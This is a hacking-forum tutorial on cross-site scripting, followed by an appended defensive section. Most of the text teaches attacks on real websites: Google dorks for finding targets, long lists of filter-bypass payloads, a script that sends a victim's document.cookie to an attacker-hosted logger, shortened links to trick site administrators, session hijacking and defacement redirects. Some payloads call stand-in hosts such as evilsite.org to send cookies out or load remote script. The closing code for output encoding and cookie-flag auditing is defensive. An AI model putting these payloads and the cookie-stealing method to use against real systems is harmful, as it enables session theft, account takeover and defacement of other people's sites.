XSS (Cross Site Scripting) :---- ULTIMATE TUTORIAL ----:

Author: The Joker (Admin)
Posted: Sun Apr 21, 2013 7:34 pm

XSS stands for Cross-Site-Scripting. It is basically an attack that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into downloading a virus that you've created, such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also set up a Cookie-Stealer/Logger. Anything you can do with HTML can be used against a site with this attack. I will explain some of the most important terms associated with XSS.


What is HTML and Javascript?



HTML

HTML is sort of like a programming language. The distinctions between a programming language and HTML are not too far apart. They are both languages that are used to create attributes and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.

Javascript

Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java is a language that resembles C++; it can be used in games and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages as HTML is. Javascript is used more in applications outside of webpages, like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.


XSS: Attacking


Now, our first step is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must (sometimes) submit multiple queries to test your site for XSS. Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to its full potential because they think it's useless. You can exploit XSS through the source as well. You can't just take any script and edit the full thing. But editing an "onmouseover" script is definitely an exception. Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar. So, let's try putting in the most known, BASIC query of all time.


<script>alert("XSS")</script>


That little script is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes these filters are very weak and can be bypassed very easily; other times they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blocking the alert. Here's an example of this kind of filter:

<script>alert( > XSS DETECTED < )</script>


It will block the quotes. So how the hell do we get past that? Well, thankfully there's a way to encrypt the full message. We will be using a little function called "String.fromCharCode". The name of it pretty much explains it all. It encrypts our text into ASCII. An example of this encryption would be like this:

<script>alert(String.fromCharCode(88,83,83))</script>


Below are some codes you can try:


Code:
"><script>alert("XSS")</script>
 
"><script>alert(String.fromCharCode(88,83,83))</script>
 
'><script>alert("XSS")</script>
 
'><script>alert(String.fromCharCode(88,83,83))</script>
 
<ScRIPt>aLeRT("XSS")</ScRIPt>
 
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
 
"><ScRIPt>aLeRT("XSS")</ScRIPt>
 
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
 
'><ScRIPt>aLeRT("XSS")</ScRIPt>
 
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
 
</script><script>alert("XSS")</script>
 
</script><script>alert(String.fromCharCode(88,83,83))</script>
 
"/><script>alert("XSS")</script>
 
"/><script>alert(String.fromCharCode(88,83,83))</script>
 
'/><script>alert("XSS")</script>
 
'/><script>alert(String.fromCharCode(88,83,83))</script>
 
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
 
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
 
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
 
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 
";alert("XSS");"
 
";alert(String.fromCharCode(88,83,83));"
 
';alert("XSS");'
 
';alert(String.fromCharCode(88,83,83));'
 
";alert("XSS")
 
";alert(String.fromCharCode(88,83,83))
 
';alert("XSS")
 
';alert(String.fromCharCode(88,83,83))
 



Cookie Stealing/Logging

Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger will log the cookies of the user who accesses the page to a certain document. The easiest way to do this would be with a three step process.

First, you should set up a site. Personally, I find http://www.000webhost.com/ the best for uploading malicious code, programs, or anything else. So go ahead and register there.

Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log into our Cookie Log. Add this code into it (just make sure the file name has .php, or else it will not run the PHP code (which is an enormous problem)).

Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin. To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.



To Tiny the URL, go to http://www.tinyurl.com/ and just put in the URL. But hold on, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.



Code:
 <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>


So just add that script after the URL, then tiny it, and send it to our Web-Admin. Now, this can take some time for the Admin to actually click it. Sometimes the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it.



Once you get the cookie, you can use the "Cookie Manager" Firefox add-on to manipulate and edit the cookies so that you can hijack the administrator's session. I find Cookie Manager a very useful app for XSS, make sure to download it.


Defacing

Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a redirect to your deface page (you should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)

<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>


Some XSS Dorks

It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:


inurl:search.php?

inurl:find.php?

inurl:search.html

inurl:find.html

inurl:search.aspx

inurl:find.aspx




XSS Dorks and Cheats COLLECTED BY BBHH

XSS Dorks

Code:

 
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

XSS Cheats

Code:


'';!--"<XSS>=&{()}
 
'>//\\,<'>">">"*"
 
'); alert('XSS
 
<script>alert(1);</script>
 
<script>alert('XSS');</script>
 
<IMG SRC="javascript:alert('XSS');">
 
<IMG SRC=javascript:alert('XSS')>
 
<IMG SRC=JaVaScRiPt:alert('XSS')>
 
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
 
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie"+escape(document.cookie)</script>
 
<scr<script>ipt>alert('XSS');</scr</script>ipt>
 
<script>alert(String.fromCharCode(88,83,83))</script>
 
<img src=foo.png onerror=alert(/xssed/) />
 
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
 
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
 
<marquee><script>alert('XSS')</script></marquee>
 
<IMG SRC=\"jav   ascript:alert('XSS');\">
 
<IMG SRC=\"jav
ascript:alert('XSS');\">
 
<IMG SRC=\"jav
ascript:alert('XSS');\">
 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 
"><script>alert(0)</script>
 
<script src=http://yoursite.com/your_files.js></script>
 
</title><script>alert(/xss/)</script>
 
</textarea><script>alert(/xss/)</script>
 
<IMG LOWSRC=\"javascript:alert('XSS')\">
 
<IMG DYNSRC=\"javascript:alert('XSS')\">
 
<font style='color:expression(alert(document.cookie))'>
 
<img src="javascript:alert('XSS')">
 
<script language="JavaScript">alert('XSS')</script>
 
<body onunload="javascript:alert('XSS');">
 
<body onLoad="alert('XSS');"
 
[color=red' onmouseover="alert('xss')"]mouse over[/color]
 
"/></a></><img src=1.gif onerror=alert(1)>
 
window.alert("Bonjour !");
 
<div style="x:expression((window.r==1)?'':eval('r=1;
 
alert(String.fromCharCode(88,83,83));'))">
 
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
 
"><script alert(String.fromCharCode(88,83,83))</script>
 
'>><marquee><h1>XSS</h1></marquee>
 
'">><script>alert('XSS')</script>
 
'">><marquee><h1>XSS</h1></marquee>
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
 
<script>var var = 1; alert(var)</script>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
 
<IMG SRC='vbscript:msgbox(\"XSS\")'>
 
" onfocus=alert(document.domain) "> <"
 
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
 
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
 
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
 
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
 
<br size=\"&{alert('XSS')}\">
 
<scrscriptipt>alert(1)</scrscriptipt>
 
</br style=a:expression(alert())>
 
</script><script>alert(1)</script>
 
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
 
[color=red width=expression(alert(123))][color]
 
<BASE HREF="javascript:alert('XSS');//">
 
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
 
"></iframe><script>alert(123)</script>
 
<body onLoad="while(true) alert('XSS');">
 
'"></title><script>alert(1111)</script>
 
</textarea>'"><script>alert(document.cookie)</script>
 
'""><script language="JavaScript"> alert('X \nS \nS');</script>
 
</script></script><<<<script><>>>><<<script>alert(123)</script>
 
<html><noalert><noscript>(123)</noscript><script>(123)</script>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
'></select><script>alert(123)</script>
 
'>"><script src = 'http://www.site.com/XSS.js'></script>
 
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
 
<SCRIPT>document.write("XSS");</SCRIPT>
 
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
 
='><script>alert("xss")</script>
 
<script+src=">"+src="http://yoursite.com/xss.js?69%2C69"></script>
 
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
 
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
 
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
 
src="http://www.site.com/XSS.js"></script>
 
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
 
!--" /><script>alert('xss');</script>
 
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
 
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
 
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
 
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
 
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
 
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
 
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
 
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>

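The "filter" the post describes (one that blocks quotes or the word alert, and is then walked around with String.fromCharCode or mixed case) is a blacklist, and the payload list above is essentially a catalogue of ways past blacklists. The defence that does not need to recognise any of those strings is contextual output encoding: every character that has meaning to the HTML parser is replaced by its entity before the reflected value is put into the page. The following is an added example, not code from the original post; `blacklistFilter` is a hypothetical stand-in for the kind of filter the post mentions, written here only for contrast, and `renderSearchPage` is a constructed mock of the search page the tutorial tests against.

```javascript
// Added example (not from the original post): contextual HTML output encoding
// versus a blacklist filter, checked against payloads from the list above.

// Entities for every character that can change parsing in an HTML text node
// or a quoted attribute value.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Escape an untrusted value for an HTML text node or a double-quoted
// attribute. Nothing is recognised or removed; the value is preserved as
// text, so there is no pattern to "bypass".
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// Mock of the search results page from the tutorial (constructed here). The
// query is reflected twice: inside value="" of the search box and in the body.
function renderSearchPage(query) {
  const safe = escapeHtml(query);
  return (
    `<form><input type="text" name="q" value="${safe}"></form>` +
    `<p>Results for: ${safe}</p>`
  );
}

// Hypothetical blacklist of the kind the post describes: strips quotes and
// the word "alert". Shown only to demonstrate why it is not a defence.
function blacklistFilter(untrusted) {
  return String(untrusted).replace(/["']/g, '').replace(/alert/gi, '');
}

// True when a string cannot open a tag or break out of a quoted attribute.
function isInert(value) {
  return !/[<>"']/.test(value);
}

// Run the whole payload list through both approaches; returns how many
// payloads each one left in a state that can still form markup.
function compare(payloads) {
  return {
    escapedStillMarkup: payloads.filter((p) => !isInert(escapeHtml(p))).length,
    blacklistStillMarkup: payloads.filter((p) => !isInert(blacklistFilter(p))).length,
  };
}

// Payloads taken from the list above (quoted here as test input).
const SAMPLE_PAYLOADS = [
  '"><script>alert("XSS")</script>',
  '<ScRIPt>aLeRT(String.fromCharCode(88,83,83))</ScRIPt>',
  "'/><script>alert(String.fromCharCode(88,83,83))</script>",
  '</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>',
];

console.log(compare(SAMPLE_PAYLOADS)); // escaped: 0 still markup; blacklist: 4
```

The point of `compare` is that the blacklist leaves every sample able to form a tag (it only removed a word and some quotes), while the escaped versions contain no `<`, `>` or quote at all, whatever case or character-code trick the payload used. Encoding must match the context the value lands in; this encoder covers text nodes and quoted attributes, and a value placed inside a script block, a URL or a CSS property needs its own context-specific encoding instead.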

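The cookie logger in the post depends on one thing: `document.cookie` being able to read the session cookie. A cookie set with the HttpOnly attribute is never exposed to script, so that read returns nothing useful even when the injection itself succeeds; Secure and SameSite narrow the remaining exposure. The following is an added example, not part of the original post, that audits Set-Cookie headers for those attributes. The headers are constructed samples, and the session-name pattern is an assumption used to flag which cookies deserve the strictest settings.

```javascript
// Added example (not from the original post): audit Set-Cookie headers for
// the attributes that blunt a document.cookie logger.

// Parse one Set-Cookie header into its name and the flags we care about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const flags = { httpOnly: false, secure: false, sameSite: null };
  for (const attr of attrs) {
    const [k, v] = attr.split('=').map((s) => s.trim());
    const key = k.toLowerCase();
    if (key === 'httponly') flags.httpOnly = true;
    else if (key === 'secure') flags.secure = true;
    else if (key === 'samesite') flags.sameSite = (v || '').toLowerCase();
  }
  return { name, ...flags };
}

// Assumed heuristic: names that look like session identifiers.
const SESSION_NAME = /sess|sid|auth|token/i;

// Report what is missing on a single cookie.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('missing HttpOnly (readable via document.cookie)');
  if (!c.secure) findings.push('missing Secure (sent over plaintext HTTP)');
  if (!c.sameSite || c.sameSite === 'none') findings.push('SameSite absent or None');
  return { name: c.name, isSession: SESSION_NAME.test(c.name), findings };
}

// Constructed sample headers: a weak session cookie, a hardened one, and a
// low-value preference cookie.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; SameSite=Lax',
];

function auditAll(headers = SAMPLE_HEADERS) {
  return headers.map(auditSetCookie);
}

for (const r of auditAll()) {
  const tag = r.isSession ? '[session]' : '[other]';
  console.log(tag, r.name, r.findings.length ? r.findings.join('; ') : 'ok');
}
```

The first sample is the shape of cookie the logger script above can actually collect; the second is the same cookie with the attributes that make `document.cookie` return nothing for it. A useful habit is to run this kind of check over every Set-Cookie header an application emits, treating any session cookie with a non-empty findings list as a defect to fix before worrying about which payload strings a filter blocks.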